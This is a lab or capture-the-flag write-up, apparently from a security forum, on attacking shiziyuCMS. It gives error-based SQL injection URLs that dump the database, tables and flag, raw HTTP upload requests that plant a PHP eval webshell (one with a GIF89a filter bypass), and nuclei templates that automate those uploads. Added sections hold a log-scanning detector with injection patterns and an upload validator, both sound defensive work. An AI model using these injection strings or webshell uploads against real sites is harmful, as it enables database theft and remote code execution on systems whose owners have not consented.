Parameter filtering in ApiController.class.php is not strict, which leads to a SQL injection vulnerability.
PoC for dumping the database name:
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)
The database name returned is shiziyu.
PoC for dumping table names:
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)
Here Burp can be used to iterate through the results, or sqlmap.
The tables found are oscshop_access, oscshop_address, oscshop_admin, oscshop_apply, oscshop_apply_relship, oscshop_area, oscshop_bad_domain, oscshop_balance, oscshop_balance_order, oscshop_bargain_goods, oscshop_bargain_order, oscshop_bargain_order_detail.
The username and password are most likely stored in the oscshop_admin table, so get that table's column names.
PoC for dumping column names:
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='oscshop_admin' limit 0,1),0x7e),1)
The columns found are a_uname, a_true_name, a_telephone, a_email, a_passwd, a_is_super, a_role_id, a_login_count.
I assumed the username and password would be in the a_uname and a_passwd columns, but after trying, there was nothing in either, so I could not log in to the backend.
After a reminder from teacher 魔方, the flag is stored in the shiziyu_flag table, so let's fetch that.
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='shiziyu_flag' limit 0,1),0x7e),1)
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select flag from shiziyu_flag limit 0,1),0x7e),1)
Only half of the flag came back, because the updatexml() error message is truncated to 32 characters, so the right() function is needed for the rest.
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select right(flag,20) from shiziyu_flag limit 0,1),0x7e),1)
Concatenate the two halves to get the full flag.
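From the defender's side, the injection above leaves a very recognisable trace: the goods_id parameter, which the application expects to be an integer, arrives carrying text and a MySQL error-reporting function. The following Python script is an added example (not code from the write-up or from the CMS) that scans constructed Apache-style access-log lines for exactly that pattern; the log lines, client addresses and the INTEGER_PARAMS list are assumptions made for the example.

```python
"""Detect error-based SQL injection attempts in web access logs.

Added example (not from the original write-up): scans constructed
Apache-style access-log lines for the pattern used against goods_id above,
i.e. a parameter that should be an integer carrying a MySQL error-based
payload such as updatexml()/extractvalue() wrapped around concat().
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Parameters the application expects to be integers (assumed for this example).
# The matching fix in the CMS is to cast goods_id to int, or bind it as a
# prepared-statement parameter, before it reaches the query.
INTEGER_PARAMS = {"goods_id"}

# MySQL functions whose error output leaks data; matched case-insensitively.
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

# Constructed sample log lines (Apache combined format; addresses are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Oct/2023:10:01:02 +0800] "GET /index.php?s=api/goods_detail&goods_id=1 HTTP/1.1" 200 1532
10.0.0.9 - - [30/Oct/2023:10:01:07 +0800] "GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1) HTTP/1.1" 500 211
10.0.0.9 - - [30/Oct/2023:10:01:09 +0800] "GET /index.php?s=api/goods_detail&goods_id=1%20AND%20EXTRACTVALUE(1,concat(0x7e,version(),0x7e)) HTTP/1.1" 500 211
10.0.0.7 - - [30/Oct/2023:10:02:15 +0800] "GET /index.php?s=api/goods_detail&goods_id=42 HTTP/1.1" 200 1490
10.0.0.9 - - [30/Oct/2023:10:02:40 +0800] "GET /index.php?s=api/goods_detail&goods_id=1%20or%201=1 HTTP/1.1" 200 1532
"""

# Pulls the method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target: str) -> List[str]:
    """Return the reasons a request target looks like injection (empty if clean)."""
    reasons = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # URL-decodes values
    for name, values in params.items():
        for value in values:
            if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value.strip()):
                reasons.append(f"non-integer value for {name}: {value!r}")
            if ERROR_FUNCS.search(value):
                reasons.append(f"error-based SQLi function in {name}")
    return reasons


def scan_log(text: str) -> List[Dict]:
    """Parse access-log lines and return the suspicious ones with their reasons."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append({"client": line.split()[0], "target": m.group("target"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["target"], "->", "; ".join(hit["reasons"]))
```

The type check on integer parameters is the more valuable of the two rules: it flags the tautology in the last sample line even though no error-based function is present, and it mirrors the application-side fix (rejecting or casting any goods_id that is not an integer).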
Vulnerable location: xxxx/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php
Capture the request and build the data as follows.

```http
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 209

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--
```

Send the packet and check the response.
It returns the upload location; visit it. Remember to prepend Common to the upload path.
Execute the one-line webshell to get the flag.
Vulnerable location: xxxx/wxapp.php?controller=Goods.doPageUpload
Capture the request and build the data as follows:

```http
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 217

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="Test.php"
Content-Type: image/gif

GIF89a
<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--
```

Note that the file content is filtered here, so the GIF89a magic header was added; the upload succeeds and returns the file path.
Visit it, execute the one-line webshell, and get the flag.
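The second upload shows why a content check on its own is not a file-upload control: the filter looked at the body, the web server looked at the extension, and the two never agreed. The Python below is an added example, not code from the CMS or the write-up; naive_check() is an assumption modelled on the bypassed behaviour, and hardened_check() shows the checks the endpoint needed (extension allowlist, magic bytes matching the claimed type, server-generated filename). The sample uploads and size limit are constructed for the example, with harmless placeholder PHP in place of the write-up's one-liner.

```python
"""Server-side upload validation: a content-only check versus a hardened one.

Added example, not code from the CMS in the write-up. naive_check() is an
assumption modelled on the bypassed filter (body only, filename ignored);
hardened_check() is what the endpoint should have done instead.
"""
import secrets
from pathlib import PurePosixPath
from typing import Optional, Tuple

# Magic bytes for the image types the endpoint is meant to accept.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for this example

# Constructed sample uploads as (content, client-supplied filename); the PHP
# bodies are harmless placeholders standing in for the write-up's one-liner.
PLAIN_SHELL = (b"<?php echo 'placeholder'; ?>", "test.php")
PREFIXED_SHELL = (b"GIF89a<?php echo 'placeholder'; ?>", "Test.php")
REAL_GIF = (b"GIF89a" + b"\x00" * 32, "photo.gif")
MISLABELLED = (b"GIF89a" + b"\x00" * 32, "photo.png")


def naive_check(content: bytes, filename: str) -> bool:
    """Assumed behaviour of the bypassed filter: accept if the body starts with
    any known image magic, ignoring the filename entirely."""
    return any(content.startswith(m) for magics in MAGIC.values() for m in magics)


def hardened_check(content: bytes, filename: str) -> Tuple[bool, str, Optional[str]]:
    """Validate an upload and return (accepted, reason, stored_name).

    Rules: size limit; extension allowlist (case-insensitive, last suffix only);
    magic bytes must match the claimed extension; the stored filename is
    generated server-side so the client-supplied name never reaches disk.
    """
    if len(content) > MAX_BYTES:
        return False, "file too large", None
    ext = PurePosixPath(filename).suffix.lower().lstrip(".")
    if ext not in MAGIC:
        return False, f"extension not allowed: {ext or '(none)'}", None
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return False, f"content does not match .{ext} magic bytes", None
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored_name


if __name__ == "__main__":
    samples = [("plain shell", PLAIN_SHELL), ("GIF89a-prefixed shell", PREFIXED_SHELL),
               ("real gif", REAL_GIF), ("mislabelled", MISLABELLED)]
    for label, (content, name) in samples:
        print(f"{label:22} naive={naive_check(content, name)!s:5} hardened={hardened_check(content, name)}")
```

The prefixed shell passes naive_check() and fails hardened_check() on the extension alone, before the body is even examined. Renaming on the server side also removes the double-extension and case tricks from play. As a separate layer, the upload directory should be configured so the web server never hands files in it to the PHP interpreter, so that a future filter bypass yields a static file rather than code execution.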
nuclei PoC:

```yaml
id: shiziyuCMS
info:
  name: shiziyuCMS-upload
  author: xxxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags
requests:
  - raw:
      - |-
        POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Length: 209

        ------WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Disposition: form-data; name="files"; filename="test.php"
        Content-Type: image/gif

        <?php @eval($_REQUEST[8]);?>
        ------WebKitFormBoundary8UaANmWAgM4BqBSs--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - image/uploads/
      - type: status
        status:
          - 200
```

nuclei verification
nuclei PoC:

```yaml
id: shiziyuCMS
info:
  name: shiziyuCMS-upload2
  author: lvqiyun
  severity: info
  description: description
  reference:
    - https://
  tags: tags
requests:
  - raw:
      - |-
        POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Length: 217

        ------WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Disposition: form-data; name="upfile"; filename="Test.php"
        Content-Type: image/gif

        GIF89a
        <?php @eval($_REQUEST[8]);?>
        ------WebKitFormBoundary8UaANmWAgM4BqBSs--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Uploads\/image\/goods
      - type: status
        status:
          - 200
```

nuclei verification
Track-魔方
Posted on 2023-10-30
Actually there is a flag in the database, in the shiziyu_flag table. Fast hands!

Track-魔方
Posted on 2023-10-30
But there is one more file upload spot, which needs a bypass to upload.

Track-魔方
Posted on 2023-10-31
[Like]

成风
Posted 8 months ago
Nice, quite detailed.